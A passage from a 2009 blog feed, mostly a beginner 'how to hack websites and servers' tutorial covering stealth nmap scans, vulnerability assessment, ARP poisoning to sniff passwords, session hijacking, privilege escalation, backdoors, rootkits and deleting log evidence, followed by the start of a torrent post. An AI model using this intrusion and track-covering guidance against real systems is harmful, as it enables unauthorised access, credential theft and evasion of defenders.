program does not connect to port that fast, so this can make it easier to be detected. Therefore you have to scan ports randomly &amp; reduce the speed of scanning. To avoid IDS, you should not use full connection scan with stealth scan, you can use half-open scan(syn). syn is considered a stealth scan. In fact, syn scan is called syn-stealth scan, or you can use Xmas scan with stealth scan which helps you to evade detection, things like that! you get my point i guess.&lt;br /&gt;&lt;br /&gt;Xmas scan: uses fin, urg, and push flags which are used to bypass some firewalls. Xmas scan works with UNIX system, it does not work with Windows system.&lt;br /&gt;&lt;br /&gt;ack scan: this helps you evading IDS not to get you detected. You send only an ack packet to your target, your target won't know how to deal with it since there was no handshake. Thus, ack scan causes open ports in your target machine to return a reset packet(rst), rst packet gives you a hint that the port or service is not filtered between point A and point B, which usually firewal resides in between! Since the port replied you with rst packet this means there is no firewall between A(your machine) &amp; B(port or service on the target machine) and rst packet also gives you an insight that the target port is open ;-). If there is a firewall, your ack packet would not reach to the target port &amp; because of that you won't get any rst packet. In addition, rst packet helps you indentify what system is running on the remote host.&lt;br /&gt;&lt;br /&gt;These are the most common method of scans, there are hundreds of scanning methods! nmap allows you to set your own custom scan type e.g. instead of sending ack flags only, you can send ack flag and rst flag together and see what you get back from target ...&lt;br /&gt;&lt;br /&gt;OK! we have talked about how TCP scanning works in general. Now, i will be talking about UDP &amp; ICMP Scanning ... UDP and ICMP connections most of the times are blocked at the firewall level &amp; even at the host level in some cases. We are going to scan on hosts &amp; ports that respond via UDP. When you scan your target via UDP, there are many problem will occur during that process e.g. you can scan over the ports via UDP, assume you scanned port 1, and port 1 is closed, then host will send ICMP unreachable back to you, which gives an insight that port is closed because you didn't get any UDP response back from target! Making sense,right? Unfortunately, we will never get a response back from target to ensure you that port is open!&lt;br /&gt;&lt;br /&gt;Thats how UDP call works, send the packet &amp; forget it. Lets say we come across port 21, and 21 is open, then port 21 on target machine will not reply back to you because UDP does not give you the guarantee the delivery packets during communication process, it just send the packet and forget, unlike TCP which guarantees the delivery of packets with no loss or corruption. Since we didn't get reply back, then we can assume the port 21 is open *OR* maybe port 21 is closed and ICMP reply got lost somewhere so we didn't get it! A general rule, when you don't get a reply you assume port is open.&lt;br /&gt;&lt;br /&gt;Some high professionals security person purposely configure ports to not to respond a UDP scanning. ICMP scanning is as same as UDP. ICMP scanning is noisy &amp; can be picked by IDS very easily because ICMP sends random several pings to the network instead of a single host(ICMP scanning does a 'ping scanning' - sends ICMP packets - to the whole network instead of a single host). After you finish ICMP scanning, based on the replies you get back from the live hosts, then you can determine that your target network is listening for ICMP traffic and you might to do some exploit based on that. Unfortunately, there aren't alot of ICMP exploits going around, so you are just going to use ICMP for network enumeration, you just do it to see what hosts are up, host A is up , host B is up &amp; host C is up, they are replying for my ICMP. Thus, this let us know these 3 hosts are running on the targeted network and potentially can be a target for us. IDS's are always listening for network scans &amp; alot of network scanners provide a support for ICMP scanning, but do not have a way to make it stealthy! Therefore, ICMP can turn on the IDS alert which tells the security person there is somebody scans your whole network.&lt;br /&gt;&lt;br /&gt;nmap is a great tool that is very popular, it is usually used to scan networks, hosts, ports, and does alot of other stuff. It is very intrusive tool and considered a hacking tool. Using nmap against systems you dont own or dont have permission to scan can be considered illegal. Lets see examples of some scanning method!&lt;br /&gt;&lt;br /&gt;Example of ICMP Scanning(-sP) - this is called ping scan&lt;br /&gt;&lt;br /&gt;nmap -v -sP xx.xxx.xxx.xx &gt; filename&lt;br /&gt;&lt;br /&gt;nmap: represents the program we are running which nmap.&lt;br /&gt;-v: for increased verbosity, which means bring me extra details of the targeted system. (Optional - as far as i know)&lt;br /&gt;-sP: the flag that determines the scanning method.&lt;br /&gt;x's: target IP address.&lt;br /&gt;&gt; filename: output the results to the newly specified filename. In other words, save results in a file (Optional)&lt;br /&gt;&lt;br /&gt;This above command shows you the systems that are up and running, so this shows what available to us on the targeted network. As a result, you will get simple info that shows you there are number of IP addresses that responded to ping request - Note: there could be alot more machines out there that are not responding to ICMP scanning.&lt;br /&gt;&lt;br /&gt;Lets see an example of UDP scan, UDP scan not so speed.&lt;br /&gt;&lt;br /&gt;nmap -v -sU xx.xxx.xxx.xx&lt;br /&gt;&lt;br /&gt;Results of UDP scan(-sU) give more info than ping scan(-sP). Keep in mind there could be hundreds of other ports are listening on the system which simply don't respond to UDP connection.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Useful sources relates to scanning methods via nmap:&lt;br /&gt;http://www.nmap-tutorial.com/pdf/nmap-tutorial.pdf&lt;br /&gt;http://www.petri.co.il/port-scanning-with-nmap.htm&lt;br /&gt;&lt;br /&gt;ALRIGHT, now you have a good basic understanding about scanning! Next, i will be talking about fingerprinting! So keep learning :-)&lt;br /&gt;&lt;br /&gt;Now lets get deeper! By now we have determined what nodes are running up on the network. So we are ready to gather large info on those live systems we discovered in the previous steps. Ok! now you need to discover what services (application) are running on your target's host. Every (or at least many) port has a service running on it. For example, web server usually are running on port 80. What we have to do is scan ports, see what kind of services(applications) are running on them, try to grab the versions of the services, this will help you to determine the OS as well. This is called 'Port &amp; Service Enumeration(fingerprinting)'. We have to do this step to understand what potential vulnerabilities your target has &amp; how to exploit them.&lt;br /&gt;&lt;br /&gt;Assume after we have scanned our target system, we found our target runs "IIS 5.0 Server" on "port 80". Based on the scanning result, you can say the targer server is running IIS 5.0(IIS is set of Internet-based services, IIS is the second most popular web server - IIS is a Microsoft product), it is known IIS 5.0. has too many vulnerabilities &amp; IIS 5.0 runs on Windows 2000, which Windows 2000 by itself has hundreds of vulns.&lt;br /&gt;&lt;br /&gt;In other words, lets scan ports and services, and do OS fingerprinting, lets identify services on those live host in our target network. Once we know what services are running and what OS are running then we can start exploiting these services! - 'ping/port/service' scans are frequently run together using the same tool.&lt;br /&gt;&lt;br /&gt;NOTE: identifying ports &amp; services is the most critical part in hacking ... PERIOD&lt;br /&gt;&lt;br /&gt;OS fingerprinting is used for determining OS type and version, then we exploit vulns. that resides into the OS. When you fingerprint a target, your targets' OS can be known from the TCP/IP stack, so fingerprinting happens on TCP/IP stack. Why? Because each OS has a unique implementation of TCP/IP, so TCP/IP stack is implemented differently from OS to OS, so an exact same query sent to one machine the respond of the result will be different than the other machine. Therefore, based on the response this can help the scanner determines the OS of the target, because every OS has its own unqiue response when you do OS fingerprinting request.&lt;br /&gt;&lt;br /&gt;When you do a default install of OS, certain services will be installed by default, services that are needed for that OS to work properly, e.g. ports&lt;br /&gt;137,138,139,and 445 which all combined together to produce Win 2000 OS or above. Another example, a combination of 139 and 445 can determine a certain version of windows such as Win XP or Win 2003, there are lots of ways to determine OS. Another example, if you see a service MS SQL is running on a certain port, you can determine the target OS is not in *nix family, it is in a Win family cause the target is running a Microsoft sql product. Thus, we can say port enumeration or service enumeration can help you in determining OS.&lt;br /&gt;&lt;br /&gt;There tons of popular scanners out there:&lt;br /&gt;SuperScan - Works good on Win OS.&lt;br /&gt;Nmap - Works on *nix &amp; Windows, *nix version is much more stable than Win version.&lt;br /&gt;&lt;br /&gt;Most scanners offer full, half, stealth, and UDP scans.&lt;br /&gt;&lt;br /&gt;You are goning to spend most of your time scanning your target machine to know whats available there, so you can exploit the vulns &amp; penetrate the system. Therefore, you have to do some exploration on scanning methods &amp; decide which method of scanning you feel more comfortable with...&lt;br /&gt;&lt;br /&gt;Lets see an example of enumeration style scanning. Just keep in mind, this can be considered hacking! Make sure you do to your system, not somebody's else.&lt;br /&gt;&lt;br /&gt;This is kind of a stealth scan:&lt;br /&gt;nmap -v -sS -A -sV xx.xxx.xx.xx &gt; filename&lt;br /&gt;&lt;br /&gt;This above request gives you very specific details about your target. sV is for version information identification. Check out the manual to know what these flags do - type "man nmap" to see the manual...&lt;br /&gt;&lt;br /&gt;Alright, after we have fingerprinted services &amp; OS, now its the time to check for various vulns against application(services) &amp; OS running on the target system. This is called vulnerability assessment. To do vulnerability assessment, you can use the tools available, such as nessus. Nessus is free vulnerability assessment, huge database, its the best assessment tool.&lt;br /&gt;&lt;br /&gt;Lets scan vulns on the target system. Lets say target system is win 2000 SP1 IIS 5.0, nessus goes back to its database and check the vulns for win2000 &amp; IIS 5.0. If there is vulns not discovered, vulnerability assessment tool actually can't catch it. However, if nessus couldn't find matching vulns for the target system, it will let you if the system can have some security issues or not. Such tools are considered as Automated Vulnerability Assessment Tools. You have to know about the target system OS so you can do vuln assessment on it. There are vuln assessment OS specific, e.g. MBSA tool(only scans Win OS).&lt;br /&gt;&lt;br /&gt;NOTE: you can do vulnerability assessment manually, this depends on you and your skills. By doing it manually, you can discover vuln. that nobody knows about it, and you can use it for your own use. It is a powerful and very discrete.&lt;br /&gt;&lt;br /&gt;After we determined what systems &amp; what services contain vulnerability, then we can exploit it(means take a chance of this vulnerability to achieve what you want).&lt;br /&gt;&lt;br /&gt;common vulnerabilities out there are:&lt;br /&gt;&lt;br /&gt;OS vulnerabilities&lt;br /&gt;Webserver vulnerabilities&lt;br /&gt;Database vulnerabilities&lt;br /&gt;TCP stack vulnerabilities&lt;br /&gt;Application vulnerabilities&lt;br /&gt;&lt;br /&gt;Malwares, viruses, trojans, can be used to exploit vulnerabilities.&lt;br /&gt;&lt;br /&gt;There are several automated vulnerability scanners, such as Nessus, Nikto. Security websites is a good resource for vulnerabilities as well, e.g.&lt;br /&gt;bugtraq, CVE(Common Vulnerabilities and Exposures) sites, etc. Another good source to find vulnerabilities is hacker web sites.&lt;br /&gt;&lt;br /&gt;Lets talk about the tools:&lt;br /&gt;&lt;br /&gt;*Nessus - this is a great vulnerability assessment tool. However, in alot of cases it will perform exploits to see if the OS or service is actually vulnerable or not.&lt;br /&gt;&lt;br /&gt;*Metasploit Framework - this is not vuln assessment tool. It is an exploitation tool, it contains hundrands of exploits helps you to exploit the system by using a nice selection of tools.&lt;br /&gt;&lt;br /&gt;I will explain shortly about the common vulns...&lt;br /&gt;&lt;br /&gt;OS Vulns: OS exploits are used to gain access to the system. OS exploits can used for DoS attacks too. watch the video tutorial. Most OS holes exist from default configuration, services and applications.&lt;br /&gt;&lt;br /&gt;Webserver Vulnerabilities: webservers are the most trageted section. All people contact the webserver, thus you never know the hacker than a normal user. Webservers examples, Apache, IIS, and Tomcat. After you exploit the vulnerability in your target webserver, you can gain many different things, such as root access(the gist), website defacement, DoS(put the server down), theft or alteration data on server, or further penetration into the network.&lt;br /&gt;Webserver is a great place to start when you want to do a penetration test!&lt;br /&gt;&lt;br /&gt;Database Vulnerabilities: those software vendors who create databases applications such as SQL, Oracle, etc - they dont have security in mind, they care more into effeciency and how to make it easy for the users to handle with the database. They care about making their customers happy without giving that much attention in security issues!&lt;br /&gt;&lt;br /&gt;TCP Stack Vulnerabilities: this is not a common used method to hack systems. Google it!&lt;br /&gt;&lt;br /&gt;Application Vulnerabilities: some examples of application vulnerability, buffer overflow, weak authentication mechanisms, poor data validation(the most common one), and poor error checking.&lt;br /&gt;&lt;br /&gt;ALRIGHT, to discover these vulnerabilities on the target machine you need to do vulnerability assessment. This can be done in two ways, manually or automatically. Manually means you try to discover a vuln. by yourself which eventually you will have vuln. that nobody else knows it &amp; you can use it for yourself or publish it to security sites. Automatically means you rely on a tool that searches for vulns in the target machine, this tool has a database full of vulns. so this 'tool' will only inform you the vulns found in the target machine by relying on 'its' database. We are going to talk about auto vulnerability assessment. The most common &amp; wonderful tool is Nessus, its free open source code!&lt;br /&gt;&lt;br /&gt;Alot of common sense comes into play when analyzing vulns, for example you do not look for a database vulnerability in a webserver, things like that. Another resources, OVAL - gives you a good and basic foundation of vulns assess. methodology, FrSIRT - keeps track of vulns and make exploits of these vulns, you can join a paid subscription and then browse vulns avaialbe in their database and download exploits this is a good source for hacking or security, and websites for posting exploits such as milw0rm, hacking sites.&lt;br /&gt;&lt;br /&gt;Lets have a closer look at nessus tool, nessus is client/server architecture. The process of setting it up is cumbersome. Nessus have about 9000 plugins, therefore it takes time to peroform the assessment. Results can be reviewed in a report. The report includes the vulnerabilities found on the target machine with a short description about the vulnerability.&lt;br /&gt;&lt;br /&gt;Note: you can enable several plug-ins in plugin tab. You can specify range of ports through scan options. To specify the target, you should go to the target tab.&lt;br /&gt;&lt;br /&gt;Once we have done the vulnerability assessment, and knew what vulnerabilities exit. We start gathering exploits of the found vulnerabilities to penetrate the system.&lt;br /&gt;&lt;br /&gt;Lets talk about penetration and access! After all information we have gathered previously, its the time to break the system with the exploits you have.&lt;br /&gt;&lt;br /&gt;Its the time to stop gathering information and start breaking into system. The ultimate goal is to gain the highest level of permissions. Try to use undiscovered techniques and methods. Think out of the box!&lt;br /&gt;&lt;br /&gt;Some of exploits that enable penetration are:&lt;br /&gt;&lt;br /&gt;*Buffer overflows&lt;br /&gt;*Stack exploits&lt;br /&gt;*Web vulnerabilities&lt;br /&gt;*Services/apps that allow unauthenticated access.&lt;br /&gt;&lt;br /&gt;Aside from the standard methods of penetration, lets see an penetration methods, here are some examples:&lt;br /&gt;&lt;br /&gt;*SQL Injection - ability to change queries in the application before its sent into database.&lt;br /&gt;&lt;br /&gt;*Application Error Handling - this can result DoS. Probably one of the most common vulnerability you can find in corporate arenas.&lt;br /&gt;&lt;br /&gt;*Directory Traversal - browse directories you should not be able to do so on.&lt;br /&gt;&lt;br /&gt;*Malformed Packets - one of the more difficult methods of penetration, requires very extensive knowledge of how TCP packets are assembled and disassembled. But once you get used to it, its probably the most effective ways of hacking.&lt;br /&gt;&lt;br /&gt;*Bypassing Access Controls - password cracking is most common means of accessing systems.&lt;br /&gt;&lt;br /&gt;*Social Engineering - i guess you know what it means.&lt;br /&gt;&lt;br /&gt;*Sniffers - take passwords right off the wire, alot of protocls and application such as http &amp; ftp communicate parrwods over the wire in plain text.&lt;br /&gt;&lt;br /&gt;*Session hijacking - it is similar to sniffers, but you don't gain a password because we take off the entire session, hijack the victim's session &amp; act as you are him.&lt;br /&gt;&lt;br /&gt;Usually when you get passwords, you get it encrypted, or hashed or hidden in some way or another. Password cracking can be done in several ways, examples:&lt;br /&gt;&lt;br /&gt;*Brute Force Attack - Every password, can and will be broken by brute force attack. It is about the time. Depends on the size of the password.&lt;br /&gt;&lt;br /&gt;*Dictionary Attack - less effective than brute force, relies on list of words or phrases.&lt;br /&gt;&lt;br /&gt;*Hybrid Attack - combination of different tools. It is a combination of effectivence of brute force and dictionary attacks &amp; often using other attack mechanisms, such as cryptanalysis attack (one of the hybird attack).&lt;br /&gt;&lt;br /&gt;You should know that when you do sniffing, you often get usernames &amp; passwords in plain text. However, you can get encrypted passwords from sniffing as well. You will need to use of the cracking techniques discussed above. Sometimes cracking an encrypted passwords can take secs, hours, days, months, or even more!!!&lt;br /&gt;&lt;br /&gt;There is a great software called "Cain &amp; Abel", it sniffs passwords from the wire, cracks it, etc. Once you install it, go to sniffers tab, then move to the found passwords in cracker tab to see what you have got! There is lots to it. You should know these techniques as a security person cause if you don't know it, a black hat will take care of it.&lt;br /&gt;&lt;br /&gt;Now, assume we already have hacked the system. We will try to do different things, such as getting the root, etc. Penetration &amp; compromise got some differences in the meaning. Hacking into system does not mean you have compromised(taking the full control - take over) the system. After you penetrate the system, you can grab the session between client and server, e.g. you keep listening on login sessions, so when the remote user login to google, the session be dropped to you, once you get the session, the remote user won't be able to get into his account he/she will see at page goes blank(disconnected), so he/she may think its a problem in a connection, thus he/she tries to login again &amp; everything works fine! BUT you already got his session, you won't have to go through login page when you want to see his/her email inbox, cause its already among the whole session you have taken.&lt;br /&gt;&lt;br /&gt;Another way to do this, lets say the attacker has compromised the user's system, thus the attacker can let the session drop on his machine, then he takes the session, reads and saves it. After that, he redirects the user to the server, this step will make everything works ok like nothing wrong happen.&lt;br /&gt;&lt;br /&gt;Lets see an example of the above explained steps, after attacker installs "Cain &amp; Abel" application, he moves to "attack base system" &amp; click the sniffer button at the top &amp; click the yellow button(APR Poisoning Button) besides the sniffer button. This APR Poising button trick the attacked system to talk to the attacker instead of normally who it talks to. For testing purposes, go and add various system addresses(IP's) to the list. Let say one of the user amongst those targeted IP's logon into 'google', at the authentication process you will notice varies pieces of info comes to you. You are gathering info by getting into the middle of the communication process. Now view the files you have got in the list, you can see among the lines the username &amp; password of the users' 'google' account in plain text! So how dangerous this can be to your privacy :-/! So be careful....&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Once the hacker gains access to the system. He aims for admin(root) access. He moves up from guest level, to user level, up to root level. Owning the box, means take the system &amp; prevent the admin from controlling the system, as well as preventing other hackers from getting in. So you hackers usually move on from the regular level, to the admin level so they can have full control. A hacker needs privilege escalation to compromise the system well. Some exploits allow buffer/stack overflows to obtain admin access. All it takes is a guest user, then a hacker can perform exploitations locally &amp; there he goes to the root.&lt;br /&gt;&lt;br /&gt;At this point, we did everything up to owning the box. Now our goal is to protect our access. Thus, we want to maintain our access to that hacked system, so we can use it later. You can maintain a system by using such tools, backdoor accounts, backdoor software programs, rootkits, etc. These tools help you maintain access. Some hackers own the box close all other accounts except his account, so the security person shut the system down, reformat the system and start over again.&lt;br /&gt;&lt;br /&gt;By doing this, hacker account will be gone. Once we ensure we have maintained our access to the system, then we want to expand ourselves to other parts of the network. Remember, if you do not do this on your own network, somebody else will take care of it. If he does, i do not think you will be too happy! Once you got an access, and could maintain it successfully. You want to prevent detection or loss of access. There are several methods to maintain access, such as rootkits, OS exploits, erase tracks, install trojans that make you access backdoor, enable null sessions (webmaster usually go to the registry &amp; disable null sessions to keep that vuln. from being exploited, webmasters usually do it once &amp; do not get back to it. You can go there &amp; enable it - NOTE: by enabling null sessions you can give other hackers a chance to hack too), and many more.&lt;br /&gt;&lt;br /&gt;There different ways of system compromise, system compromise usually depends on your goal, examples of system compromising are root access(ultimate goal), data access/theft, DoS, and many more. Keep in mind, compromised systems can be detected after a while.&lt;br /&gt;&lt;br /&gt;Now after a hacker breaks into the system, he tries to portect what he has hacked &amp; erase his tracks. During the attack process try not to be detected so the webmaster don't shut the server off, as well as do not forget to erase your tracks, e.g. you dont want the webmaster to see lots of failed logon in the log files, so you erase tracks to prevent future detection. Typically, get in the network as a shadow or ghost.&lt;br /&gt;&lt;br /&gt;There are many method to evade those IDS so they don't cut off your attack stream. Common methods for evading defenses might be by fragmenting packets(some programs do that e.g. fragroute), port redirectors, encoders(change the flow, the look, and feel of various traffics to pass firewall). After you get in and deceive defenses, you want to go to the log files and erase your tracks. Remember: sometimes you get in a user account then you get into a root by changing permissions of the user account, so you have to remember to set this user permissions back to as it was, things like that - you know what i mean, put yourself in a hackers shoe. Don't delete the whole log files, this can make the security person more suspicious. We want to leave everything as it was so nobody can get a feel that an intruder was here.&lt;br /&gt;&lt;br /&gt;To be safe, you should know where your actions are recorded, delete log files and other evidences that can get you caught, steganography(google it), and evading IDS &amp; firewalls. All actions are recorded in some place on the system or the network. Assume IDS detects you, what do security persons do? Usually when you get detected, they may cut off all the ways for you so you don't get a chance to penetrate, they probably going track you down, or they may decide let you go but watch you the entire time.&lt;br /&gt;&lt;br /&gt;Where are your actions recorded &amp; what things can let security person knows that you hacked his system? they are recorded in log files for various applications(e.g. IIS &amp; Apache log files), file access times(note: there are tools for hackers that allow you to modify file access time), windows registry entries, hacker tools left behind (be aware of the residual configuration you have left behind - make sure you set all the configurations back to as it was), OS performance stats, IDS, proxy servers(make sure how you send and receive data. If you are going to use proxy server, set up a permanent tunnel through the proxy to the remote host that is compromised), and firewalls(usually very rich with logs).&lt;br /&gt;&lt;br /&gt;There are various types of IDS, IDS can set anywhere in the network. There are network based IDS, host based IDS, and application based IDS.&lt;br /&gt;&lt;br /&gt;Deleting evidences of your hack is extremely difficult, it requires you have a very high knowledge of the system you are trying to compromise(all the prior steps we did, such as scanning, foot printing, etc will be handy to compromise the system). It is easy to cover the known log files, such as web logs, firewall, IDS logs, etc. However, it is important to know how the default logs work. Highly skilled hackers, study the target well &amp; take the time in fingerprinting &amp; footprinting everything properly. It may take him up to one week before he hacks the target, but when he penetrates his job is done more smoothly &amp; quietly. Unlike, the other ones who are just using some tools to break the system as fast as possible without studying the target well.&lt;br /&gt;&lt;br /&gt;It is possible to delete log files! It is simple but usually requires admin access. Some files/logs may be deleted automatically with reboot. Don't delete log files, it brings up suspicion. If you do so, the security person can indicates very clearly that a hacker broke into the system.&lt;br /&gt;&lt;br /&gt;Most common way of hiding your tracks is by using a rootkit. Rootkit is set of tools used by an attacker after the attacker gets the root-access to system. Rootkits conceals(to keep from being observed) attacker activities on the hacked system. Once rootkit set on the system, its practically impossible to rid of it because rootkit uses technology, called "hooks", that usually most of the time embed itself into various components of OS &amp; effectively the OS going to be a toaster when the rootkit is all set and done. Security person has to rebuild his machine when rootkit is detected after we properly investigate it.&lt;br /&gt;&lt;br /&gt;Steganography its about hiding a file into another file. Like hiding a malware into a normal software which makes it difficult for firewall or AV to detect the malware. Thats the basic concept of Steganography. There are alot of tools out there allow us to hide files inside another files.&lt;br /&gt;&lt;br /&gt;You can evade IDS &amp; firewalls by using random slow stealth scanning technique so traffic goes unnoticed, this takes longer to scan but makes detection more difficult. Try to use non-standard techniques, think outside the box.&lt;br /&gt;&lt;br /&gt;Remember: not everyone out there is a security expert. To secure your system well, you need to put yourself in a hacker set of mind.&lt;br /&gt;&lt;br /&gt;By now, you have learned the basic methodology that hackers use to break into the system. Anyhow, lets take a closer look on hacking techniques, such as encryption, sql injection, sniffers, and many more.&lt;br /&gt;&lt;br /&gt;Encryption: files can be encrypted in a storage. Communication channels can be encrypted as well, communication channel encryption encrypts the entire communication path, so all traffics sent and received are encrypted, e.g. SSL technology encrypts the entire communication path. There are many ways hackers get away of encrypted traffic &amp; get info in not encrypted form. If you are using your own encryption method, you always should test your encryption for crackability before you use it officially.&lt;br /&gt;&lt;br /&gt;Sniffers: sniffers is a common tool used by hackers. Sniffers listens on any traffic that goes through the wire of the target system, listens ins and outs traffics. Promiscuous mode is a mode that is listening for any traffic that goes through the wire. Standard promiscuous mode sniffer is a basic technique. There are more advanced techniques other than promiscuous mode. Sniffing enables the attacker to pick up a plain text, and other sensitive data that goes 'from' or 'to' the target. Sniffers record captured traffic, then after you sniff you can go offline &amp; start analyzing that captured traffic. Popular sniffers are ethereal, etherape, ettercap, and network monitor(for Win OS only - not so effective).&lt;br /&gt;&lt;br /&gt;Wireless Hacking: this is a new technology &amp; starts taking place nowadays. Easy to setup, but not frequently secured since not many people understand the security configuration, so they decide not to set it up or set it up poorly. There are various tools that detect wireless networks, popular war driving software are Netstumbler, Airsnort, Airopeek, Kismet, and many more. What is war driving? google it!&lt;br /&gt;&lt;br /&gt;SQL Injection: sql injection is a technique that allows an attacker to steal a valuable database information. This attack relies on poor data validation and poor error checking.&lt;br /&gt;&lt;br /&gt;Buffer Overflows: buffer overflow is common, the cause of buffer overflow is poor coding. Buffer overflows might be noticed while coding. Buffer overflow happens when the programmer does not clearly define boundaries on buffers or variables. We use out of bound data to insert malicious code or execute command on the remote host. Buffer Overflows can cause programs to freeze or lockup, can cause machine to crash, or let you use exploits &amp; leads you to compromise the system. To build buffer overflows, you need a good programming skills, good knowledge of stack and buffer vulns.&lt;br /&gt;&lt;br /&gt;You need to have the ability to research, analyze vulns &amp; apply the exploit to achieve what you want. Buffer overflow is a very common &amp; hard to produce an application with no buffer overflows at all. There is nothing programmers can do about it, they just need to write the code with security mind of set. If unexpected buffer overflow appears later by chance, programmers will have to fix it. Programmers should test their code from vulnerabilities as much as they can before they publish the application.&lt;br /&gt;&lt;br /&gt;Rootkits: it is a common hacker technique. Rootkit is malicious program that replaces components of OS. It does a stealth job. Rootkit requires root permission, so you can install it. Linux rootkits are common &amp; you can find them everywhere, unlike Windows. It is very hard to detect a rootkit because it embeds itself so deeply into the target system. Removing rootkit from a system is very hard too, if the security person tries to remove the rootkit out of the system, he will destroy the system since the rootkit is embedded so deeply into the system(into components of OS). The good solution is to format the whole system &amp; install it again.&lt;br /&gt;&lt;br /&gt;Spoofing: the word spoofing defined as making yourself appear as somebody else. Examples of spoofing, you can spoof an IP address and make yourself appear to be somewhere else, MAC addresses, and emails(very simple to spoof, you send an email to somebody by changing the headers, and things like that). Spoof usually relies on poor implementation of TCP/IP itself or poor implementation of applications. Tools that are used for spoofing differs from one platform to another. Example of the tools, IP spoofing utilities, MAC address modifiers, etc. Spoofing is more into using your skills rather than using a tool.&lt;br /&gt;&lt;br /&gt;Denial of Service (DoS): DoS is very common. The ultimate idea is to prevent legitimate users from using the system. Running DoS is very simple, you don't gain anything from doing DoS. Hackers do it to threat companies, things like that. Many methods/level of DoS attacks exist. Examples of some ways of to DoS, ping of death, Windows size overflow, smurf, teardrop attacks, and many more. There are lots of different ways to do it!&lt;br /&gt;&lt;br /&gt;Web Hacking: web hacking is the most popular attacks. It is based on hacking individual sites, servers, or components based on the website. First step a hacker takes is, enumerate services(applications) on target machine, and then determine what webserver software(apache, IIS, etc) is running on the target system. After that, the hacker exploits against vulns. found in the target system. It will be easier to hack if the hacker knows the version of the service/software running.&lt;br /&gt;&lt;br /&gt;A webserver attack leads to deeper penetration on the network(move into the target's internal network). Popular attack methods are xxs(cross-site scripting), IIS DLL vulnerabilities(IIS is very commonly exploited), directory traversal, unicode attack, and many more.&lt;br /&gt;&lt;br /&gt;What is Unicode attack?&lt;br /&gt;here is quick rough description about Unicode attack, lets say you want to pass space into a URL. If you put a space in URL, webserver will not take your URL, webserver will consider the url is invalid. Thus, if you want to put spaces among the URL, you should put the number 20 in a place of the space(number 20 represents the space), so when the URL goes to the webserver, the webserver says Ok! thats a valid URL, lets process it and so it does. Unicode attack uses this technique in a non-standard(bad way) way to attack the webserver. Thats a quick explaination about unicode attack.&lt;br /&gt;&lt;br /&gt;I'm already about to finish this tutorial, i will just talk about popular tools in a brief manner. I will start with namp.&lt;br /&gt;&lt;br /&gt;Nmap is the most popular hacker tool outhere. Linux command line nmap works better and is supported better. Nmap comes with ping utility, port scanning utility, service enumeration &amp; OS fingerprinting.&lt;br /&gt;&lt;br /&gt;SuperScan is a windows based tool developed by foundstone Inc. Its easy to use it &amp; a good tool for Windows.&lt;br /&gt;&lt;br /&gt;Nessus is used for vulnerability assessment. It is an open source software kit, with commercial version available as well. Nessus uses client/server architecute. Server will be installed on a central location. Nessus comes in GUI &amp; command line interface. Nessus uses database that carries latest current exploits for all types of OS &amp; application. Databases in nessus are called plug-ins, hundrends of vulnerability plug-ins exist and are updated daily to include latest exploits. Nessus requires high level of knowledge to use the tool very effeciently. You can go out to the web and download an exploit and then add it to the database. Nessus can take quite long time to do vulnerability assessment.&lt;br /&gt;&lt;br /&gt;Finally, the information in this tutorial have been gathered from various types of sources, and then i wrote the tutorial in an organized manner from scratch as well as i added some stuff &amp; clarified many parts.&lt;br /&gt;&lt;br /&gt;After you have read this tutorial, i recommend you to search and learn about Windows Null Sessions, it is the most critical flaws associated with Windows OS, and google about DNS zone transfers!&lt;br /&gt;&lt;br /&gt;This tutorial is a good guide for you that gives you an insight on how to start &amp; different techniques that hackers use and how they are used. I hope you have enjoyed this tutorial &amp; helped you in someway or another. I'm not supporting any illegal activities. This tutorial for people who wants to know how hackers think, what steps they take to break into systems &amp; how they do it, so people can have an insight on how to protect themselves against intruders.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;***This tutorial is made for educational purposes only***&lt;br /&gt;&lt;br /&gt;Best Regards,&lt;br /&gt;ʇsıʎqqoɥ&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-6711925866148726447?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/6711925866148726447/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/how-to-hack-websites-servers-from.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6711925866148726447'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6711925866148726447'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/how-to-hack-websites-servers-from.html' title='How to Hack Websites &amp; Servers from Scratch!!! Step by Step Tutorial for Beginners'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-1184330977252630337</id><published>2009-01-03T05:13:00.000-08:00</published><updated>2009-01-03T05:20:51.797-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorials'/><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><category scheme='http://www.blogger.com/atom/ns#' term='Torrent'/><title type='text'>A tutorial about speeding up torrent download and list of sites</title><content type='html'>A tutorial about speeding up torrent download and list of sites&lt;br /&gt;Download Bit Torrent Files.&lt;br /&gt;&lt;br /&gt;What is Bit Torrent in Plain English?&lt;br /&gt;Bit Torrent is a program you download. It is similar to a peer-to-peer file sharing service. Basically it goes like this: You download the installer. You get the link to a file that ends in .torrent and enter that URL into your browser (preferably Internet Explorer). This opens the Bit Torrent download window. It starts downloading the file, or episode that you wanted (eg. alias2x01.torrent). As it downloads, it uploads the parts that you have to other people so many people can get it at once. When you've finished downloading the file, you can leave the window open (don't press finish or close the window) and other people can still download from you. This is very much encouraged.&lt;br /&gt;I'm new to all this. How do I download with Bit Torrent???&lt;br /&gt;&lt;br /&gt;First we need to download and install a Bit Torrent client&lt;br /&gt;&lt;br /&gt;Official client 3.3&lt;br /&gt;CODE&lt;br /&gt;http://www.bitconjurer.org/BitTorrent/index.html&lt;br /&gt;&lt;br /&gt;Experimental client 3.2.1b-2&lt;br 